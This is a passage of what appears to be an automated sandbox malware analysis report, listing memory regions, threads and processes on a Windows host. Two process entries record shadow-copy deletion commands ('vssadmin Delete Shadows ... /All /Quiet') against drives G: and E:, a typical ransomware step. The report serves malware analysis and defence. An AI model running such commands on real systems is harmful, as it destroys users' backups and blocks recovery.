	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 5399
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 5400
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 5401
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 5402
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 5403
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 5406
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 5407
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 5410
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 5411
	        start_va = 0x2beb9b00000
	          end_va = 0x2beb9b0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9b00000"
	        filename = ""

Region:
	              id = 5413
	        start_va = 0x2bebb5f0000
	          end_va = 0x2bebb926fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 5414
	        start_va = 0x2beb9b10000
	          end_va = 0x2beb9b69fff
	       monitored = 1
	     entry_point = 0x2beb9b253f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 5415
	        start_va = 0x2beb9b70000
	          end_va = 0x2beb9b90fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 5420
	        start_va = 0x2bebb930000
	          end_va = 0x2bebbb4efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebb930000"
	        filename = ""

Region:
	              id = 5429
	        start_va = 0x2bebbb50000
	          end_va = 0x2bebbd68fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebbb50000"
	        filename = ""

Region:
	              id = 5430
	        start_va = 0x2bebb3f0000
	          end_va = 0x2bebb505fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebb3f0000"
	        filename = ""

Region:
	              id = 5431
	        start_va = 0x2bebb5e0000
	          end_va = 0x2bebb5effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebb5e0000"
	        filename = ""

Region:
	              id = 5440
	        start_va = 0x2bebbd70000
	          end_va = 0x2bebbf80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebbd70000"
	        filename = ""

Region:
	              id = 5441
	        start_va = 0x2bebbf90000
	          end_va = 0x2bebc09afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebbf90000"
	        filename = ""

Region:
	              id = 5458
	        start_va = 0xe9644c0000
	          end_va = 0xe9644fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e9644c0000"
	        filename = ""

Region:
	              id = 5459
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 5460
	        start_va = 0x2beb9b10000
	          end_va = 0x2beb9b10fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9b10000"
	        filename = ""

Region:
	              id = 5461
	        start_va = 0x2bebb510000
	          end_va = 0x2bebb5cbfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002bebb510000"
	        filename = ""

Region:
	              id = 5462
	        start_va = 0x2beb9b10000
	          end_va = 0x2beb9b13fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9b10000"
	        filename = ""

Region:
	              id = 5463
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 5465
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 5466
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 5467
	        start_va = 0x2beb9b20000
	          end_va = 0x2beb9b26fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9b20000"
	        filename = ""

Region:
	              id = 5468
	        start_va = 0x2beb9b30000
	          end_va = 0x2beb9b30fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9b30000"
	        filename = ""

Region:
	              id = 5469
	        start_va = 0x2beb9b40000
	          end_va = 0x2beb9b40fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9b40000"
	        filename = ""

Region:
	              id = 5470
	        start_va = 0x2beb9b50000
	          end_va = 0x2beb9b54fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 5471
	        start_va = 0x2beb9b60000
	          end_va = 0x2beb9b60fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 5472
	        start_va = 0x2beb9b70000
	          end_va = 0x2beb9b71fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9b70000"
	        filename = ""

Region:
	              id = 5473
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 5474
	        start_va = 0x2beb9b80000
	          end_va = 0x2beb9b80fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 5475
	        start_va = 0x2beb9b90000
	          end_va = 0x2beb9b91fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9b90000"
	        filename = ""


Thread:
	id = 391
	os_tid = 0x134c


Thread:
	id = 392
	os_tid = 0xd30


Thread:
	id = 397
	os_tid = 0x7ec


Thread:
	id = 399
	os_tid = 0xd08


Process:
	id = "73"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2a783000"
	os_pid = "0x12b4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "68"
	os_parent_pid = "0x11c8"
	cmd_line = "vssadmin  Delete Shadows /For=G: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5361
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5362
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5363
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5364
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5365
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 5366
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 5367
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 5368
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 5369
	        start_va = 0x400000
	          end_va = 0x401fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 5370
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 5371
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 5372
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5373
	        start_va = 0x7e620000
	          end_va = 0x7e642fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e620000"
	        filename = ""

Region:
	              id = 5374
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5375
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5376
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5377
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5378
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5386
	        start_va = 0x100000
	          end_va = 0x1bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 5391
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5392
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5393
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5397
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5398
	        start_va = 0x410000
	          end_va = 0x52ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 5404
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5405
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5408
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5409
	        start_va = 0x7e520000
	          end_va = 0x7e61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e520000"
	        filename = ""

Region:
	              id = 5416
	        start_va = 0x530000
	          end_va = 0x5edfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5417
	        start_va = 0x400000
	          end_va = 0x403fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 5418
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 5419
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5421
	        start_va = 0x100000
	          end_va = 0x13ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 5422
	        start_va = 0x140000
	          end_va = 0x17ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000140000"
	        filename = ""

Region:
	              id = 5423
	        start_va = 0x1b0000
	          end_va = 0x1bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 5424
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 5425
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 5426
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 5427
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 5428
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 5432
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 5433
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 5434
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 5435
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 5436
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 5437
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 5438
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 5439
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 5442
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 5443
	        start_va = 0x5f0000
	          end_va = 0x7cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005f0000"
	        filename = ""

Region:
	              id = 5444
	        start_va = 0x5f0000
	          end_va = 0x777fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005f0000"
	        filename = ""

Region:
	              id = 5445
	        start_va = 0x780000
	          end_va = 0x7a9fff
	       monitored = 0
	     entry_point = 0x785680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5446
	        start_va = 0x7c0000
	          end_va = 0x7cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007c0000"
	        filename = ""

Region:
	              id = 5447
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5448
	        start_va = 0x410000
	          end_va = 0x41cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 5449
	        start_va = 0x430000
	          end_va = 0x52ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000430000"
	        filename = ""

Region:
	              id = 5450
	        start_va = 0x4880000
	          end_va = 0x4a00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 5451
	        start_va = 0x4a10000
	          end_va = 0x5e0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a10000"
	        filename = ""

Region:
	              id = 5452
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 5453
	        start_va = 0x180000
	          end_va = 0x180fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000180000"
	        filename = ""

Region:
	              id = 5454
	        start_va = 0x420000
	          end_va = 0x423fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000420000"
	        filename = ""

Region:
	              id = 5455
	        start_va = 0x5e10000
	          end_va = 0x5ef9fff
	       monitored = 0
	     entry_point = 0x5e4d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 5464
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 5725
	        start_va = 0x780000
	          end_va = 0x780fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000780000"
	        filename = ""

Region:
	              id = 5726
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 5727
	        start_va = 0x790000
	          end_va = 0x790fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000790000"
	        filename = ""

Region:
	              id = 5769
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5770
	        start_va = 0x7d0000
	          end_va = 0x80ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007d0000"
	        filename = ""

Region:
	              id = 5774
	        start_va = 0x810000
	          end_va = 0x84ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000810000"
	        filename = ""

Region:
	              id = 5775
	        start_va = 0x5e10000
	          end_va = 0x5e4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005e10000"
	        filename = ""

Region:
	              id = 5776
	        start_va = 0x5e50000
	          end_va = 0x5e8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005e50000"
	        filename = ""

Region:
	              id = 5777
	        start_va = 0x5e90000
	          end_va = 0x5ecffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005e90000"
	        filename = ""

Region:
	              id = 5821
	        start_va = 0x5ed0000
	          end_va = 0x5faffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 5822
	        start_va = 0x5fb0000
	          end_va = 0x602ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005fb0000"
	        filename = ""

Region:
	              id = 5823
	        start_va = 0x7a0000
	          end_va = 0x7a8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 394
	os_tid = 0x12b8


Thread:
	id = 398
	os_tid = 0x1200


Thread:
	id = 417
	os_tid = 0x1250


Thread:
	id = 419
	os_tid = 0xe84


Thread:
	id = 420
	os_tid = 0xf1c


Process:
	id = "74"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2cc46000"
	os_pid = "0x1268"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=E: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
